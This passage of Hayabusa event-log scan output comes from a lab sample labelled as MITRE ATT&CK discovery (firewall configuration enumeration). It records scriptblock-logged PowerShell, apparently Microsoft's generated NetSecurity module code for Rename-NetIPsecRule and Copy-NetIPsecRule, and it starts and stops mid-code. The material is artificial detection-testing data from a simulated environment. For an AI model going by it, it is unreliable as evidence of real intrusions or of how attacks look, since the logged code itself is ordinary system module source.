[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,".Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', 